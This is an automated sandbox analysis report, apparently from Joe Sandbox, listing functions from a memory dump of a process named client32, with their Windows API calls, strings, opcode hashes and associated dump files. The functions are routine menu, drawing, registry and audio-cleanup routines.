Instruction Fuzzy Hash: 1A210B3DF187617FC602DE45BC83F9BF7E45F9165CF048039EA4627241E671A804C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 1115F620 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 1115F62F
_memset.LIBCMT ref: 1115F64B
GetMenuItemID.USER32(?,00000000), ref: 1115F65C

Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2

CheckMenuItem.USER32(?,00000000,00000000), ref: 1115F698
EnableMenuItem.USER32 ref: 1115F6AE
SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1115F6C4

Strings

0, xrefs: 1115F655

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemMenu$_memset$CheckCountEnableInfoVersion
String ID: 0
API String ID: 176136580-4108050209
Opcode ID: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
Instruction ID: be0221c4a5135c336c62c383b80ea9a6d71c1dc3530fa78f313eaeef8d4c2bd6
Opcode Fuzzy Hash: 952994a233711950fdab02d23ca0bcaac5a8ee4e392a6680f60084daabe75429
Instruction Fuzzy Hash: C621A17591111AABE741DB74CE84FAFBBACEF46358F104025F961E6160DB74DA00C772

Uniqueness

Uniqueness Score: -1.00%

Function 11120080 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 111200AE
SelectObject.GDI32(?,?), ref: 111200C2
DeleteObject.GDI32(00000000), ref: 111200C9
SelectPalette.GDI32 ref: 111200EF
SetStretchBltMode.GDI32(?,00000001), ref: 1112011B

Strings

View, xrefs: 11120101
ScaleToFitMode, xrefs: 111200FC

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$DeleteSelect$ModePaletteStretch
String ID: ScaleToFitMode$View
API String ID: 87851494-1738379822
Opcode ID: 4993134ee5c432808221ce5443bd13d9feca13f6c448318a07e1a74400df2388
Instruction ID: 201830c2c875b140aabe40817b5b83dce627b488e33d5f9193c9f17d6522663c
Opcode Fuzzy Hash: 4993134ee5c432808221ce5443bd13d9feca13f6c448318a07e1a74400df2388
Instruction Fuzzy Hash: B4012575250B05AFE3659BB5D888BA7F3E9FB88709F10491CE5AAC2280CB74B8008B51

Uniqueness

Uniqueness Score: -1.00%

Function 11003400 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32 ref: 1100340E
GetSubMenu.USER32 ref: 1100343A
GetSubMenu.USER32 ref: 1100345C
DestroyMenu.USER32(00000000), ref: 1100346A

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\annotate.cpp, xrefs: 1100341F, 11003447
hMenu, xrefs: 11003424
hSub, xrefs: 1100344C

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
Instruction ID: 1378fb0f7ab2c0978cd4d50cac7dc25882af45c4d25f08e40c7e232078aa5069
Opcode Fuzzy Hash: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
Instruction Fuzzy Hash: B3F0E93AE9063573E25252A71C86F9FE2488B45699F500032F926BA580EA14B80043E9

Uniqueness

Uniqueness Score: -1.00%

Function 11003310 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32 ref: 1100331D
GetSubMenu.USER32 ref: 11003343
GetMenuItemCount.USER32 ref: 11003367
DestroyMenu.USER32(00000000), ref: 11003379

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

..\CTL32\annotate.cpp, xrefs: 1100332E, 11003354
hMenu, xrefs: 11003333
hSub, xrefs: 11003359

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 4241058051-934300333
Opcode ID: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
Opcode Fuzzy Hash: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9

Uniqueness

Uniqueness Score: -1.00%

Function 111442D0 Relevance: 12.1, APIs: 8, Instructions: 85COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000000,?,775EC740), ref: 111442F0
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144303
GetFileVersionInfoSizeA.VERSION(?,?), ref: 11144323
_malloc.LIBCMT ref: 1114432F

Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56

GetFileVersionInfoA.VERSION(?,?,00000000,00000000,?), ref: 1114434D
_free.LIBCMT ref: 1114435D

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

VerQueryValueA.VERSION(?,1119A5BC,?,?,?,?,00000000,00000000,?), ref: 1114438E
_free.LIBCMT ref: 111443B1

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$HeapInfoModuleVersion_free$AllocateErrorFreeHandleLastNameQuerySizeValue_malloc
String ID:
API String ID: 1929493397-0
Opcode ID: edd211c50a3777fb5ac3ae8ca10e20c72d94fd26d850039a83edcecaba31b236
Instruction ID: 533d070b008c48d0019e4fafecd2d90481fbd6e663e37e79b598d21e300b118d
Opcode Fuzzy Hash: edd211c50a3777fb5ac3ae8ca10e20c72d94fd26d850039a83edcecaba31b236
Instruction Fuzzy Hash: 242161769001299BDB14DF64DC44EDEF3BCEF58714F004199E94997200DAB1AE94CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1100C7A0 Relevance: 12.1, APIs: 8, Instructions: 79sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 1100BDB0: EnterCriticalSection.KERNEL32(000000FF,0CBC1010,?,00000000,00000000,1100CEA3,0000000F,Error. acmStreamOpen (out) ret %d,00000000), ref: 1100BDE4
Part of subcall function 1100BDB0: EnterCriticalSection.KERNEL32(?), ref: 1100BE23
Part of subcall function 1100BDB0: waveInStop.WINMM(?), ref: 1100BE34
Part of subcall function 1100BDB0: waveInReset.WINMM(?), ref: 1100BE3B
Part of subcall function 1100BDB0: LeaveCriticalSection.KERNEL32(?), ref: 1100BE42
Part of subcall function 1100BDB0: SetEvent.KERNEL32(?), ref: 1100BE57
Part of subcall function 1100BDB0: Sleep.KERNEL32(00000032), ref: 1100BE67
Part of subcall function 1100BDB0: EnterCriticalSection.KERNEL32(?), ref: 1100BE79
Part of subcall function 1100BDB0: waveInUnprepareHeader.WINMM(?,?,00000020), ref: 1100BE9D
Part of subcall function 1100BDB0: _free.LIBCMT ref: 1100BEAA
Part of subcall function 1100BDB0: waveInClose.WINMM(?), ref: 1100BEDB
Part of subcall function 1100BDB0: LeaveCriticalSection.KERNEL32(?), ref: 1100BEEF

SetEvent.KERNEL32(?), ref: 1100C7C8
Sleep.KERNEL32(00000032), ref: 1100C7E2
CloseHandle.KERNEL32(?), ref: 1100C85D
DeleteCriticalSection.KERNEL32(?), ref: 1100C86D
DeleteCriticalSection.KERNEL32(?), ref: 1100C873
DeleteCriticalSection.KERNEL32(?), ref: 1100C879
DeleteCriticalSection.KERNEL32(?), ref: 1100C87F
FreeLibrary.KERNEL32(?), ref: 1100C888

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Deletewave$Enter$CloseEventLeaveSleep$FreeHandleHeaderLibraryResetStopUnprepare_free
String ID:
API String ID: 1559121828-0
Opcode ID: a22ebfafbd2fe0c88242975addf47c03f71e9ea64018652a159b6a33f03a0722
Instruction ID: 2616f0ca377e895a93c84c6c6260a92787aed28b1ca8a879078d94bfad696922
Opcode Fuzzy Hash: a22ebfafbd2fe0c88242975addf47c03f71e9ea64018652a159b6a33f03a0722
Instruction Fuzzy Hash: 1721B7BAA0070597E615EB708840ABFF3AABFC1718F15455CD46A5B304DB36F505CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1101B530 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 204libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018915,0CBC1010,?,?,?,1117EE88,000000FF), ref: 110DEB61

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

std::exception::exception.LIBCMT ref: 1101B776
__CxxThrowException@8.LIBCMT ref: 1101B791
LoadLibraryA.KERNEL32(NSSecurity.dll,00000000,111CD988), ref: 1101B7AE

Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA

Strings

NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B70A
NSSecurity.dll, xrefs: 1101B7A3
NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B6E9

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalEnterException@8LibraryLoadSectionThrowXinvalid_argument_malloc_memsetstd::_std::exception::exceptionwsprintf
String ID: NSSecurity.dll$NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
API String ID: 3515807602-1044166025
Opcode ID: 588cb19a3c3d912c54ea92af62dbabfffedc2c4dc41ecd2320497b5117311d98
Instruction ID: 97a0dec6d0d64d3c3877ebf05293913b11e378911f3366e288316342895a3808
Opcode Fuzzy Hash: 588cb19a3c3d912c54ea92af62dbabfffedc2c4dc41ecd2320497b5117311d98
Instruction Fuzzy Hash: 72718FB5D00309DFEB10CFA4C844BDDFBB4AF19318F244569E915AB381DB79AA44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 110935A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2

GetWindowLongA.USER32 ref: 110935E9
SetWindowLongA.USER32 ref: 11093617

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

GetWindowLongA.USER32 ref: 11093640
SetWindowLongA.USER32 ref: 1109366E

Strings

m_hWnd, xrefs: 110935D6, 11093603, 1109362D, 1109365A
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110935D1, 110935FE, 11093628, 11093655

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LongWindow$ErrorExitLastMessageProcessVersion_memsetwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2973435017-2830328467
Opcode ID: bec04fe564d6b3850833210fc124e11f10e4a7d0c7b4bad0230e56c4fe519f4b
Instruction ID: a6255a4dd11f96cfd194679b8cc3cdd2b3575d4c8ce1213ed658c40333833496
Opcode Fuzzy Hash: bec04fe564d6b3850833210fc124e11f10e4a7d0c7b4bad0230e56c4fe519f4b
Instruction Fuzzy Hash: 1431E4B5A04615ABCB14DF65DC81F9BB3E5AB8C318F10862DF56A973D0DB34B840CB98

Uniqueness

Uniqueness Score: -1.00%

Function 110ED7B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000,00000000,775E8890), ref: 110ED801
_free.LIBCMT ref: 110ED81C

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

_malloc.LIBCMT ref: 110ED82E
RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110ED85A
_free.LIBCMT ref: 110ED8E3

Strings

Error %d getting %s, xrefs: 110ED89D

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue_free$ErrorFreeHeapLast_malloc
String ID: Error %d getting %s
API String ID: 582965682-2709163689
Opcode ID: 59ae116487e404f5de4155705fcd48daf632d85a688279f19c106630c28adf20
Instruction ID: 02eced05e3356085969bcbe05084d5abf0c2b7b1903d0388d20c61e7be7eac91
Opcode Fuzzy Hash: 59ae116487e404f5de4155705fcd48daf632d85a688279f19c106630c28adf20
Instruction Fuzzy Hash: F1318375D001289BDB60DA59CD84BEEB7F9EF54314F0481E9E88DA7240DE706E89CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 110040F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91windowCOMMON

Download Yara Rule

APIs

EnableWindow.USER32(00000000,00000000), ref: 11004130
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 110041A7
InvalidateRect.USER32(00000000,00000000,00000000), ref: 110041D2
EnableWindow.USER32(00000000,00000001), ref: 110041FE

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11004117, 110041BD, 110041EB
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11004112, 110041B8, 110041E6

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnableWindow$ErrorExitInvalidateLastMessageProcessRectwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2354609054-2830328467
Opcode ID: bc77aff694d436de89820df397cf97f2537acd50e9dcce0a0b494a4fafc6c394
Instruction ID: c13629e3a69401f36b1837560bfd6e90eee75297420fac0ab380ec534ade091b
